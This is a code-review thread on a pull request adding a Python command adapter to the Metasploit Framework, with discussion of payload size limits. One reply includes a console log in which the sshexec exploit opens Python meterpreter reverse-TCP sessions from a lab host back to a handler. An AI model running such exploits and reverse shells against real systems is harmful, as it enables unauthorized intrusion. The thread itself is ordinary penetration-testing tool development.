modules/payloads/adapters/cmd/unix/python.rb

```diff
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Payload::Adapter
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Python Exec',
+        'Description' => 'Execute a Python payload from a command.',
+        'Author' => 'Spencer McIntyre',
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_PYTHON,
+        'AdaptedPlatform' => 'python'
+      )
+    )
+  end
+
+  def compatible?(mod)
```

Comment:
Consider ensuring the size added to the wrapped payload is accounted for.

Reply:
So I looked into this. I tested with the `sshexec` module by defining a space of 1000 for the "Unix Cmd" target.

It looks like space isn't accounted for by the framework at all unless the payload needs to be encoded. This PR doesn't change that though. This seems to be indicative of a larger issue. Once the payload is generated, the final size including what was added by the adapter is [checked](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/encoded_payload.rb#L253) which can lead to the encoding failure seen below but when no encoder is used, there doesn't appear to be any check at all.

Can you let me know if there's another location where you're concerned about the size? Also for clarity, there are potentially two size constraints to be taken into consideration. The first is for the payload that is to be adapted which is ~120K chars as limited by the `echo` command. The second is for the adapted payload to fit in the space the exploit has available. The check here in this function is for the first constraint, to ensure that only payloads that will fit in echo are marked as compatible.

```
msf6 exploit(multi/ssh/sshexec) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.27:22 - Sending stager...
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.27:39574 ) at 2022-02-24 13:31:29 -0500
[!] Timed out while waiting for command to return

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.27 - Meterpreter session 5 closed.  Reason: User exit
msf6 exploit(multi/ssh/sshexec) > set ENCODER generic/none
ENCODER => generic/none
msf6 exploit(multi/ssh/sshexec) > exploit

[-] Exploit failed: cmd/unix/python/meterpreter_reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/ssh/sshexec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/ssh/sshexec) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.27:22 - Sending stager...
[*] Sending stage (39804 bytes) to 192.168.159.27
[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.27:39576 ) at 2022-02-24 13:31:52 -0500
[!] Timed out while waiting for command to return

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.27 - Meterpreter session 6 closed.  Reason: User exit
msf6 exploit(multi/ssh/sshexec) > pry
[*] Starting Pry shell...
[*] You are in the "exploit/multi/ssh/sshexec" module object

[1] pry(#<Msf::Modules::Exploit__Multi__Ssh__Sshexec::MetasploitModule>)> payload_space
=> 1000
[2] pry(#<Msf::Modules::Exploit__Multi__Ssh__Sshexec::MetasploitModule>)> 
```

Reply:
I tested [`#compatible_payloads`](https://github.com/rapid7/metasploit-framework/blob/da044a967a39816f25c6978c13ca655dea6f4c89/lib/msf/core/exploit.rb#L733) and it appears to be working as intended right now. That function powers tab completion for `set PAYLOAD <tab>` as well as `show payloads` from in the context of an exploit module.

Reply:
> It looks like space isn't accounted for by the framework at all unless the payload needs to be encoded. 

Fix proposed in PR #16228.